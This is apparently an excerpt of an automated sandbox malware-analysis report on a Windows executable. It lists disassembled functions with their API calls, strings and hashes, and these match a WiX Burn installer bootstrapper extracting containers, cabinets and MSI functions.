Failed to parse command line., xrefs: 005A7667
WixBundleUILevel, xrefs: 005A76D6, 005A76E7
Failed to initialize variables., xrefs: 005A7571

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleUILevel
API String ID: 32694325-1564579409
Opcode ID: 052b1716410a0fa3a77ed5aef96162fdb505fcbcfdacb73b81c702026a1a5548
Instruction ID: 9559209a581fdad17261bc5e5997a9b6bf3067dcf6eb9e33ba037e8f16c3b8ea
Opcode Fuzzy Hash: 052b1716410a0fa3a77ed5aef96162fdb505fcbcfdacb73b81c702026a1a5548
Instruction Fuzzy Hash: 6AA17472E4461FBBDB269AA4CC45EEEBFACBB09700F000666F515E7241D734E944DBA0

Function 005A86D0 Relevance: 35.2, APIs: 9, Strings: 11, Instructions: 209
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,40000000,00000005,00000000,00000002,08000080,00000000,?,00000000,00000000,00594DBC,?,?,00000000,00594DBC,00000000), ref: 005A8713
GetLastError.KERNEL32 ref: 005A8720

Part of subcall function 005D3EDD: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 005D3F73

SetFilePointerEx.KERNEL32(00000000,005DB4B8,00000000,00000000,00000000,?,00000000,005DB500,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005A87CD
GetLastError.KERNEL32 ref: 005A87D7
CloseHandle.KERNELBASE(00000000,?,00000000,005DB500,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005A8902

Strings

msi.dll, xrefs: 005A8814
Failed to seek to signature table in exe header., xrefs: 005A886C
Failed to seek to original data in exe burn section header., xrefs: 005A88DB
Failed to copy user from: %ls to: %ls, xrefs: 005A87A8
cache.cpp, xrefs: 005A8744, 005A87FB, 005A8862, 005A88D1
Failed to seek to beginning of user file: %ls, xrefs: 005A8779
cabinet.dll, xrefs: 005A887B
Failed to seek to checksum in exe header., xrefs: 005A8805
Failed to zero out original data offset., xrefs: 005A88F4
Failed to create user file at path: %ls, xrefs: 005A8751
Failed to update signature offset., xrefs: 005A8821

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: File$ErrorLast$CloseCreateHandlePointerRead
String ID: Failed to copy user from: %ls to: %ls$Failed to create user file at path: %ls$Failed to seek to beginning of user file: %ls$Failed to seek to checksum in exe header.$Failed to seek to original data in exe burn section header.$Failed to seek to signature table in exe header.$Failed to update signature offset.$Failed to zero out original data offset.$cabinet.dll$cache.cpp$msi.dll
API String ID: 3456208997-1976062716
Opcode ID: c761f2323d08e9e6a1803d7568ecb9ceb2f8c43f08f7ae58dd6c706a9ae3cf49
Instruction ID: c1113d046a46940e74fd6dad8ec289d2f4e0ff3a83b4b6bac9d335b5683978a8
Opcode Fuzzy Hash: c761f2323d08e9e6a1803d7568ecb9ceb2f8c43f08f7ae58dd6c706a9ae3cf49
Instruction Fuzzy Hash: 2851B477A41236BBEB215A558C4AE7F3E68FF45B50F110526FE00FB281EF259C0096E1

Function 0059762C Relevance: 34.9, APIs: 1, Strings: 22, Instructions: 420
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(005A756B,005953BD,00000000,00595445), ref: 0059764C

Strings

#, xrefs: 005976CB
WixBundleSourceProcessFolder, xrefs: 00597E9E
InstallerName, xrefs: 00597812
InstallerVersion, xrefs: 00597833
Date, xrefs: 00597770
Failed to add built-in variable: %ls., xrefs: 00597F19
WixBundleProviderKey, xrefs: 00597E7E
WixBundleInstalled, xrefs: 00597E2A
WixBundleExecutePackageAction, xrefs: 00597DF8
', xrefs: 005978EB
LogonUser, xrefs: 00597882
WixBundleExecutePackageCacheFolder, xrefs: 00597D98
WixBundleForcedRestartPackage, xrefs: 00597E14
WixBundleElevated, xrefs: 00597E46
0, xrefs: 00597663
WixBundleVersion, xrefs: 00597ECE
WixBundleTag, xrefs: 00597EAE
WixBundleAction, xrefs: 00597D76
WixBundleSourceProcessPath, xrefs: 00597E8E
WixBundleActiveParent, xrefs: 00597E62
$, xrefs: 00597D49
WixBundleUILevel, xrefs: 00597EBE

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleUILevel$WixBundleVersion
API String ID: 32694325-3635313340
Opcode ID: 94a4fe2397bc143bf1abe9b74e8c78c3c9b7aa2c820f7bd700e916c362dae5ce
Instruction ID: ed2e99da1ddb0f2d51761ff0f13b472813fc4b22fc706c48011d7723f109ea59
Opcode Fuzzy Hash: 94a4fe2397bc143bf1abe9b74e8c78c3c9b7aa2c820f7bd700e916c362dae5ce
Instruction Fuzzy Hash: 913235B0D156299BDB65CF5AC98879DFEF4BB49304F9085EED20CAA310D7B01A88CF45

Function 005A82BA Relevance: 33.4, APIs: 7, Strings: 12, Instructions: 153
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00595489), ref: 005A8310

Part of subcall function 005D0879: OpenProcessToken.ADVAPI32(?,00000008,?,005953BD,00000000,?,?,?,?,?,?,?,005A769D,00000000), ref: 005D0897
Part of subcall function 005D0879: GetLastError.KERNEL32(?,?,?,?,?,?,?,005A769D,00000000), ref: 005D08A1
Part of subcall function 005D0879: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,005A769D,00000000), ref: 005D092B

GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 005A8336
GetLastError.KERNEL32 ref: 005A8340
GetTempPathW.KERNEL32(00000104,?,00000000), ref: 005A83BD
GetLastError.KERNEL32 ref: 005A83C7
UuidCreate.RPCRT4(?), ref: 005A8406

Strings

%ls%ls\, xrefs: 005A8458
Failed to ensure windows path for working folder ended in backslash., xrefs: 005A838B
Failed to create working folder guid., xrefs: 005A8413
Failed to convert working folder guid into string., xrefs: 005A8446
cache.cpp, xrefs: 005A8364, 005A83EB, 005A843C
Failed to concat Temp directory on windows path for working folder., xrefs: 005A83AD
Failed to copy working folder path., xrefs: 005A848B
Failed to get windows path for working folder., xrefs: 005A836E
4#v, xrefs: 005A83BD
Failed to append bundle id on to temp path for working folder., xrefs: 005A8470
Temp\, xrefs: 005A8395
Failed to get temp path for working folder., xrefs: 005A83F5

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLast$Process$CloseCreateCurrentDirectoryHandleOpenPathTempTokenUuidWindows
String ID: 4#v$%ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
API String ID: 266130487-3587817078
Opcode ID: 9a3d995dfcb396e88ae1a9676b4f4baa7682d59a50e5f5862d8655b90257285e
Instruction ID: 18ca420c82c28bc77db311af21f2524687c5892d4e72c764c8695b7930f6597f
Opcode Fuzzy Hash: 9a3d995dfcb396e88ae1a9676b4f4baa7682d59a50e5f5862d8655b90257285e
Instruction Fuzzy Hash: 3741F572E41726A7DF3096E48C0EFBE7F6CBB55B90F010562BA48E7180EA749D0496E1

Function 005B10FB Relevance: 30.0, APIs: 8, Strings: 9, Instructions: 217
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 005B111D
CoUninitialize.COMBASE ref: 005B1398

Strings

Invalid operation for this state., xrefs: 005B137C
Failed to set operation complete event., xrefs: 005B12C4
cabextract.cpp, xrefs: 005B1193, 005B12BA, 005B1307, 005B1346, 005B1372
Failed to initialize COM., xrefs: 005B1129
Failed to initialize cabinet.dll., xrefs: 005B119F
Failed to extract all files from container, erf: %d:%X:%d, xrefs: 005B1279
<the>.cab, xrefs: 005B11BD
Failed to wait for begin operation event., xrefs: 005B1311
Failed to reset begin operation event., xrefs: 005B1350

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: InitializeUninitialize
String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
API String ID: 3442037557-1168358783
Opcode ID: a2f2e3f7bfeb0bacdc96f4dd740310432f840a6f0feb849e90d1b6272acb14e6
Instruction ID: 2ac038f360f059f3085e6e1e0dc6ebccdd59a54d1f8de18d4701ec6e0a8d05b1
Opcode Fuzzy Hash: a2f2e3f7bfeb0bacdc96f4dd740310432f840a6f0feb849e90d1b6272acb14e6
Instruction Fuzzy Hash: D2519C3B9419A2D78F6057A68C15EFBBE54BB40760B620726FC01FB290D615BD00D2DD

Function 005942D7 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 158
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,00595266,?,?,00000000,?,?), ref: 00594303
InitializeCriticalSection.KERNEL32(000000D0,?,?,00595266,?,?,00000000,?,?), ref: 0059430C
lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,00595266,?,?,00000000,?,?), ref: 00594352
lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,00595266,?,?,00000000,?,?), ref: 0059435C
CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00595266,?,?,00000000,?,?), ref: 00594370
lstrlenW.KERNEL32(burn.filehandle.attached,?,?,00595266,?,?,00000000,?,?), ref: 00594380
lstrlenW.KERNEL32(burn.filehandle.self,?,?,00595266,?,?,00000000,?,?), ref: 005943D0
lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,00595266,?,?,00000000,?,?), ref: 005943DA
CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00595266,?,?,00000000,?,?), ref: 005943EE
lstrlenW.KERNEL32(burn.filehandle.self,?,?,00595266,?,?,00000000,?,?), ref: 005943FE

Strings

burn.filehandle.attached, xrefs: 0059434D, 00594355, 0059435A, 0059435B, 0059437B, 0059449F
burn.filehandle.self, xrefs: 005943CB, 005943D3, 005943D8, 005943D9, 005943F9, 005944CB
Failed to parse file handle: '%ls', xrefs: 00594482
user.cpp, xrefs: 00594495, 005944C1
Missing required parameter for switch: %ls, xrefs: 005944A4
Failed to initialize user section., xrefs: 00594467

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: lstrlen$CompareCriticalInitializeSectionString
String ID: Failed to initialize user section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$user.cpp
API String ID: 3039292287-3209860532
Opcode ID: 09bf9d582e1684f48f7644b816edcd4d8202a645f34ba8c59747bb3151c95f90
Instruction ID: 012cdf83cac1275d103baa4b89203b0eabf461ddfea7e70f436cff320bed0ad1
Opcode Fuzzy Hash: 09bf9d582e1684f48f7644b816edcd4d8202a645f34ba8c59747bb3151c95f90
Instruction Fuzzy Hash: 7151A171A00216FEDF34DB68CC46F9A7F69FF54B60F010117F618A7290D770A941CAA0

Function 0059C28F Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 131
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,0059C47F,00595405,?,?,00595445), ref: 0059C2D6
GetLastError.KERNEL32(?,0059C47F,00595405,?,?,00595445,00595445,00000000,?,00000000), ref: 0059C2E7
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,0059C47F,00595405,?,?,00595445,00595445,00000000,?), ref: 0059C336
GetCurrentProcess.KERNEL32(000000FF,00000000,?,0059C47F,00595405,?,?,00595445,00595445,00000000,?,00000000), ref: 0059C33C
DuplicateHandle.KERNELBASE(00000000,?,0059C47F,00595405,?,?,00595445,00595445,00000000,?,00000000), ref: 0059C33F
GetLastError.KERNEL32(?,0059C47F,00595405,?,?,00595445,00595445,00000000,?,00000000), ref: 0059C349
SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,0059C47F,00595405,?,?,00595445,00595445,00000000,?,00000000), ref: 0059C39B
GetLastError.KERNEL32(?,0059C47F,00595405,?,?,00595445,00595445,00000000,?,00000000), ref: 0059C3A5

Strings

Failed to move file pointer to container offset., xrefs: 0059C3D3
feclient.dll, xrefs: 0059C398
Failed to open container., xrefs: 0059C3F1
crypt32.dll, xrefs: 0059C397
Failed to duplicate handle to container: %ls, xrefs: 0059C37A
container.cpp, xrefs: 0059C30B, 0059C36D, 0059C3C9
Failed to open file: %ls, xrefs: 0059C318

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp$crypt32.dll$feclient.dll
API String ID: 2619879409-373955632
Opcode ID: ca6335965d82cb95df05c6c96e4fd3c6e34bc59b1eb05e2ff15b68bead06fa71
Instruction ID: 74c4c936742345e71f532716779b2298276df05ef41e1a261a43579f697148d2
Opcode Fuzzy Hash: ca6335965d82cb95df05c6c96e4fd3c6e34bc59b1eb05e2ff15b68bead06fa71
Instruction Fuzzy Hash: B241A436140201ABDF309F699D49E1B7FA6FBD4B60F21882BF9159B381DB71D801EB60

Function 005D2AF7 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 79
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00593838: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00593877
Part of subcall function 00593838: GetLastError.KERNEL32 ref: 00593881

Part of subcall function 005D4A6C: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 005D4A9D

GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 005D2B41
GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 005D2B61
GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 005D2B81
GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 005D2BA1
GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 005D2BC1
GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 005D2BE1
GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 005D2C01

Strings

MsiGetProductInfoExW, xrefs: 005D2BB6
Msi.dll, xrefs: 005D2B09
MsiSetExternalUIRecord, xrefs: 005D2BD6
MsiDeterminePatchSequenceW, xrefs: 005D2B36
MsiGetPatchInfoExW, xrefs: 005D2B96
MsiSourceListAddSourceExW, xrefs: 005D2BF6
MsiEnumProductsExW, xrefs: 005D2B76
MsiDetermineApplicablePatchesW, xrefs: 005D2B56

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: AddressProc$ErrorLast$DirectorySystem
String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
API String ID: 2510051996-1735120554
Opcode ID: a6ea74c3859ea67dacad5b21488f83ed038e81646048c206df8f45aab8e35ff7
Instruction ID: db4ba719be51386986094f1fa2a87e887cc654fcbd3999a573d6519a36370edc
Opcode Fuzzy Hash: a6ea74c3859ea67dacad5b21488f83ed038e81646048c206df8f45aab8e35ff7
Instruction Fuzzy Hash: F331B0B0941208EEFB219F24ED06A3A7FA5FB30304F20052BE504D6670EBB94849FF54

Function 005B1741 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 106COMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,00000000,00000000,?,?,0059C3EB,?,00000000,?,0059C47F), ref: 005B1778
GetLastError.KERNEL32(?,0059C3EB,?,00000000,?,0059C47F,00595405,?,?,00595445,00595445,00000000,?,00000000), ref: 005B1781

Strings

Failed to wait for operation complete., xrefs: 005B1854
cabextract.cpp, xrefs: 005B17A5, 005B17EB, 005B1837
Failed to create begin operation event., xrefs: 005B17AF
Failed to create extraction thread., xrefs: 005B1841
Failed to create operation complete event., xrefs: 005B17F5
Failed to copy file name., xrefs: 005B1763
wininet.dll, xrefs: 005B1757

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CreateErrorEventLast
String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp$wininet.dll
API String ID: 545576003-938279966
Opcode ID: 2f3434dcd7525f4675c7819bda45d059b5a637f1b4b2d321863799c8d3d18127
Instruction ID: 159ea4ed44de73f632595141cbbeb098687401b4ca1741aea1119edfe1d3607c
Opcode Fuzzy Hash: 2f3434dcd7525f4675c7819bda45d059b5a637f1b4b2d321863799c8d3d18127
Instruction Fuzzy Hash: 8521EA77D41A37B6E73116A54C69F9B6E5CFB04BA0B520226FD40BB181EB50FC0096E9

Function 005CFCAE Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 76libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 005CFCD6
GetProcAddress.KERNEL32(SystemFunction041), ref: 005CFCE8
GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 005CFD2B
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 005CFD3F
GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 005CFD77
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 005CFD8B

Strings

cryputil.cpp, xrefs: 005CFD60
SystemFunction040, xrefs: 005CFCCB
CryptUnprotectMemory, xrefs: 005CFD6C
AdvApi32.dll, xrefs: 005CFCB5
Crypt32.dll, xrefs: 005CFD0C
CryptProtectMemory, xrefs: 005CFD20
SystemFunction041, xrefs: 005CFCD8

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: AddressProc$ErrorLast
String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$SystemFunction040$SystemFunction041$cryputil.cpp
API String ID: 4214558900-3191127217
Opcode ID: 1603ee5cc4d44941c5ce10b7247f27ff6e9bd2f365a9412886cdb905d484edde
Instruction ID: 61a46abb2477e7a498bb84a8ca9d83bdcb28bfd415e7453d0c8203706f3a195f
Opcode Fuzzy Hash: 1603ee5cc4d44941c5ce10b7247f27ff6e9bd2f365a9412886cdb905d484edde
Instruction Fuzzy Hash: 4721B676941226DFE7315B91ED09F666D91BB20B50F060139ED01EB2A0F76D8C08EB90

Function 005B08C2 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 106fileCOMMON

Download Yara Rule

APIs

CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 005B08F2
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 005B090A
GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 005B090F
DuplicateHandle.KERNELBASE(00000000,?,?), ref: 005B0912
GetLastError.KERNEL32(?,?), ref: 005B091C
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 005B098B
GetLastError.KERNEL32(?,?), ref: 005B0998

Strings

Failed to add virtual file pointer for cab container., xrefs: 005B0971
Failed to open cabinet file: %hs, xrefs: 005B09C9
cabextract.cpp, xrefs: 005B0940, 005B09BC
Failed to duplicate handle to cab container., xrefs: 005B094A
<the>.cab, xrefs: 005B08EB

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
API String ID: 3030546534-3446344238
Opcode ID: 71206d358570169aec13c8bbd22047a1a03efa015efe81517c409b75b9e15a8e
Instruction ID: ff9ece02cb2300a4f96e1d9cef76e6c28b6c9e655a57baf0d7b5d435fb335063
Opcode Fuzzy Hash: 71206d358570169aec13c8bbd22047a1a03efa015efe81517c409b75b9e15a8e
Instruction Fuzzy Hash: A431A176942236FBEB215AA58C49E9FBE68FF04B60F124116FD44B7291D720AD00D6E1

Function 005A6A57 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 69COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(000000FF,00000000,00000001,00000002,?,00000000,?,?,00594E11,?,?), ref: 005A6A77
GetCurrentProcess.KERNEL32(?,00000000,?,?,00594E11,?,?), ref: 005A6A7D
DuplicateHandle.KERNELBASE(00000000,?,?,00594E11,?,?), ref: 005A6A80
GetLastError.KERNEL32(?,?,00594E11,?,?), ref: 005A6A8A
CloseHandle.KERNEL32(000000FF,?,00594E11,?,?), ref: 005A6B03

Strings

Failed to duplicate file handle for attached container., xrefs: 005A6AB8
burn.filehandle.attached, xrefs: 005A6AD0
core.cpp, xrefs: 005A6AAE
%ls -%ls=%u, xrefs: 005A6AD7
Failed to append the file handle to the command line., xrefs: 005A6AEB

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CurrentHandleProcess$CloseDuplicateErrorLast
String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to duplicate file handle for attached container.$burn.filehandle.attached$core.cpp
API String ID: 4224961946-4196573879
Opcode ID: 4bf76563a6340c144d38d822bce8de24cf3b57a84f938c8bbdf66edf7491c589
